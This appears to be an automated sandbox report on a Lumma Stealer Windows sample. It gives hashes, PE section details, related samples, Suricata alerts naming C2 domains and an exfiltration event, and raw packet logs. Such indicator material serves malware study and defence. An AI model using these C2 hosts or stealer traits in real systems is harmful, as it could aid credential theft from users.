                                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                                              SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                                              ForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                                              Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                                              Vq50tK1Nx2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                                              IzDjbVdHha.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              steamcommunity.comfnnGMmd8eJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              PW6pjyv02h.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Script.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Neverlose.cc-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.121.10.34
                                                                                                                                                                                                                                                              SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.102.49.254

                                                                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                              AKAMAI-ASN1EUfnnGMmd8eJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              PW6pjyv02h.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Script.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Neverlose.cc-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              CLOUDFLARENETUSfnnGMmd8eJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              lumma.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.167.249
                                                                                                                                                                                                                                                              BagsThroat.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                              • 104.21.80.1
                                                                                                                                                                                                                                                              ronwod.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.21.92.219
                                                                                                                                                                                                                                                              ronwod.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.198.222
                                                                                                                                                                                                                                                              installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                              • 172.67.166.49
                                                                                                                                                                                                                                                              Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.132.7
                                                                                                                                                                                                                                                              Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                                              Script.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                                              48.252.190.9.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 104.21.95.219

                                                                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1MrIOYC1Pns.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              fnnGMmd8eJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              PW6pjyv02h.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              lumma.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              BagsThroat.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              ronwod.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              ronwod.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106

                                                                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                                                              No created / dropped files found

                                                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Entropy (8bit):7.94864927061151
                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                              File name:hx0wBsOjkQ.exe
                                                                                                                                                                                                                                                              File size:1'810'944 bytes
                                                                                                                                                                                                                                                              MD5:e58e6e26d4ff748bd8e7f718372f8351
                                                                                                                                                                                                                                                              SHA1:5ec62018f2c5e2f7b91be03fa1c022ad3368cab8
                                                                                                                                                                                                                                                              SHA256:1b7cdc9c01de521674db6bc4f5ef66d4666d084cf197b8adec56bc431992c253
                                                                                                                                                                                                                                                              SHA512:f098d80f905726d009755079106940a9eb55c8ff824c3fc4770c11f4cc86be0d1b77fd2a857eab15e9791f29a86ffd7b3d7fdebf9d5a84c7ef9e117f6c690abe
                                                                                                                                                                                                                                                              SSDEEP:49152:SrOGXYh1FPrUyF6pQ5kHQVxEPjoSLq9gjb9jrXLr:LGXmXrUukHQVu8t9gP9jr7
                                                                                                                                                                                                                                                              TLSH:1C85331BC569A872C62CDB300D96C7383C609BEC12FDE834FAA6AF14A25FE4B60D5155
                                                                                                                                                                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................G...........@...........................G...........@.................................Y@..m..

                                                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                                                              Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Entrypoint:0x87b000
                                                                                                                                                                                                                                                              Entrypoint Section:.taggant
                                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                              Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                                              jmp 00007FB9E4D13B2Ah
                                                                                                                                                                                                                                                              jo 00007FB9E4D13B41h
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              jmp 00007FB9E4D15B25h
                                                                                                                                                                                                                                                              add byte ptr [edx+ecx], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              xor byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              aas
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [edx], ah
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [ecx], cl
                                                                                                                                                                                                                                                              add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              push es
                                                                                                                                                                                                                                                              or al, byte ptr [eax]
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al

                                                                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x1ac.rsrc
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                              Sections

                                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                              0x10000x520000x2640082ab32983a7161944787b5bb22578babFalse0.9996234170751634COM executable for DOS7.978175791647224IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              .rsrc0x530000x1ac0x200c4249243ceaeb236e3ce8ce2ab2c9a69False0.5390625data5.249019796122045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              0x550000x2950000x20085465ae03a5166e72d4cd95d27be198eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              lzvphivs0x2ea0000x1900000x1900001f9013ae66f8b3880a5d0b2a1a77d937False0.9948883056640625data7.954180945897147IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              rnhdfjfr0x47a0000x10000x600016cbff4d3f6e493def49542c8dcd7a1False0.6419270833333334data5.368554111073558IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              .taggant0x47b0000x30000x2200fb09a72c380797f5719a994721443009False0.06261488970588236DOS executable (COM)0.781984085496635IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                                              Resources

                                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                              RT_MANIFEST0x530580x152ASCII text, with CRLF line terminators0.6479289940828402

                                                                                                                                                                                                                                                              Imports

                                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                                              kernel32.dlllstrcpy

                                                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                              2024-12-28T09:29:36.356310+01002058582ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mindhandru .buzz)1192.168.2.10552841.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-28T09:29:36.561159+01002058584ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz)1192.168.2.10602681.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-28T09:29:36.804865+01002058586ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz)1192.168.2.10548301.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-28T09:29:36.952553+01002058588ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz)1192.168.2.10587401.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-28T09:29:37.100521+01002058580ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz)1192.168.2.10593211.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-28T09:29:37.245130+01002058590ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz)1192.168.2.10601021.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-28T09:29:37.387470+01002058572ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz)1192.168.2.10509161.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-28T09:29:37.530359+01002058576ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz)1192.168.2.10527031.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-28T09:29:37.676217+01002058578ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz)1192.168.2.10529901.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-28T09:29:39.410611+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.104970023.55.153.106443TCP
                                                                                                                                                                                                                                                              2024-12-28T09:29:40.200416+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.104970023.55.153.106443TCP
                                                                                                                                                                                                                                                              2024-12-28T09:29:41.830604+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049701172.67.157.254443TCP
                                                                                                                                                                                                                                                              2024-12-28T09:29:42.579579+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1049701172.67.157.254443TCP
                                                                                                                                                                                                                                                              2024-12-28T09:29:42.579579+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049701172.67.157.254443TCP
                                                                                                                                                                                                                                                              2024-12-28T09:29:43.843810+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049702172.67.157.254443TCP
                                                                                                                                                                                                                                                              2024-12-28T09:29:44.589530+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1049702172.67.157.254443TCP
                                                                                                                                                                                                                                                              2024-12-28T09:29:44.589530+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049702172.67.157.254443TCP
                                                                                                                                                                                                                                                              2024-12-28T09:29:46.317494+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049703172.67.157.254443TCP
                                                                                                                                                                                                                                                              2024-12-28T09:29:48.506896+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049704172.67.157.254443TCP
                                                                                                                                                                                                                                                              2024-12-28T09:29:49.645133+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1049704172.67.157.254443TCP
                                                                                                                                                                                                                                                              2024-12-28T09:29:51.109686+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049705172.67.157.254443TCP
                                                                                                                                                                                                                                                              2024-12-28T09:29:54.467025+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049707172.67.157.254443TCP
                                                                                                                                                                                                                                                              2024-12-28T09:29:57.393602+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049710172.67.157.254443TCP
                                                                                                                                                                                                                                                              2024-12-28T09:30:00.285341+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049711172.67.157.254443TCP

                                                                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.969954014 CET49700443192.168.2.1023.55.153.106
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.970006943 CET4434970023.55.153.106192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.970068932 CET49700443192.168.2.1023.55.153.106
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.972243071 CET49700443192.168.2.1023.55.153.106
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.972258091 CET4434970023.55.153.106192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:39.410466909 CET4434970023.55.153.106192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:39.410610914 CET49700443192.168.2.1023.55.153.106
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:39.414685011 CET49700443192.168.2.1023.55.153.106
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:39.414710999 CET4434970023.55.153.106192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:39.414995909 CET4434970023.55.153.106192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:39.456672907 CET49700443192.168.2.1023.55.153.106
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:39.465379953 CET49700443192.168.2.1023.55.153.106
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:39.511333942 CET4434970023.55.153.106192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.200463057 CET4434970023.55.153.106192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.200490952 CET4434970023.55.153.106192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.200529099 CET4434970023.55.153.106192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.200552940 CET4434970023.55.153.106192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.200572014 CET4434970023.55.153.106192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.200598001 CET49700443192.168.2.1023.55.153.106
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.200598001 CET49700443192.168.2.1023.55.153.106
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.200614929 CET4434970023.55.153.106192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.200767994 CET49700443192.168.2.1023.55.153.106
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.200767994 CET49700443192.168.2.1023.55.153.106
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.386240005 CET4434970023.55.153.106192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.386286020 CET4434970023.55.153.106192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.386475086 CET49700443192.168.2.1023.55.153.106
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.386497974 CET4434970023.55.153.106192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.386687994 CET49700443192.168.2.1023.55.153.106
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.418467999 CET4434970023.55.153.106192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.418502092 CET4434970023.55.153.106192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.418554068 CET49700443192.168.2.1023.55.153.106
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.418569088 CET4434970023.55.153.106192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.418582916 CET4434970023.55.153.106192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.418629885 CET49700443192.168.2.1023.55.153.106
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.418629885 CET49700443192.168.2.1023.55.153.106
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.420155048 CET49700443192.168.2.1023.55.153.106
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.420155048 CET49700443192.168.2.1023.55.153.106
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.420170069 CET4434970023.55.153.106192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.420178890 CET4434970023.55.153.106192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.567720890 CET49701443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.567773104 CET44349701172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.567835093 CET49701443192.168.2.10172.67.157.254
